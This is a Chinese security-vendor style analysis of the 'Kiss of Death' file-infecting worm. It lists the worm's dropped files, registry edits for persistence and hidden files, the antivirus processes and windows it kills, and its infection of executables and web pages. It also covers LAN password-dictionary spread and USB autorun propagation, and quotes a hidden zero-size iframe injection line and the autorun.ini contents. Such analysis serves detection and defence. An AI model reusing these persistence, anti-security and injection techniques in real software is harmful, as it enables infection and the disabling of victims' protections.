病毒名称(中文):
死亡之吻
病毒别名:
威胁级别:
★★☆☆☆
病毒类型:
蠕虫病毒
病毒长度:
94720
影响系统:
Win9xWinMeWinNTWin2000WinXPWin2003
病毒行为:
这是一个类似熊猫烧香的感染型病毒,它能感染可执行文件与网页文件,
并能通过局域网与U盘传播.
1.在病毒所在目录下释放感染前原文件%病毒名%1L1~.exe
并往系统目录里面释放一个病毒体
%system%\\Supervise.exe(Worm.Death.ab.103936)
2.修改注册表
使"显示隐藏文件"不可选
HKLM\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL
"CheckedValue"="0x00"
添加自启动项
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"Supervise.exe"="%system%\\Supervise.exe"
3.中止进程
病毒中止以下进程名的进程
EGHOST.EXE
MAILMON.exe
kavpfw.exe
iparmor.exe
_AVP32.EXE
_AVPCC.exe
_avpm.exe
avp.exe
navapw32.exe
navw32.exe
nod32kui.exe
nod32kru.exe
PFW.exe
Kfw.exe
KAVPFW.exe
vsmon.exe
Mcshield.exe
VstskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
RKVXP.kxp
KvmonXP.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundll32.exe
runiep.exe
4.枚举窗口
病毒枚举桌面上的窗口,向窗口名为以下字符的窗口发送退出的消息
SymantecAntiVirus企业版
江民杀毒软件KV2006:实时监视
LockDownMain
ZoneAlarm
天网防火墙个人版
天网防火墙企业版
VirusScan
SymantecAntivirus
DubaWrappedgiftKiller
IceSword
pjf(ustc)
噬菌体
木马克星
5.感染文件
病毒会感染以下扩展名文件:
EXE
SCR
COM
PIF
HTM
HTML
ASP
PHP
JSP
ASPX
其中可执行文件是叠加感染,而脚本文件则添加一个高度与宽度都为0的框架,
代码如下:
<iframesrc=http://*****.com.cn/baidu.htmwidth=0height=0>
6.局域网传播
病毒生成密码字典C:\pass.dic
并使用该字典上面的密码尝试登录局域网内机器
若登录成功,则感染该机
7.感染移动硬盘
病毒会在移动存储器的分区里面生成autorun.ini
写入以下内容
[Autorun]
OPEN=Death.exe
shellexecute=Death.exe
shell\Auto\command=Death.exe
并拷贝一个病毒体到分区里面,一但用户不注重时,病毒就通过U盘传染到另一台机器上
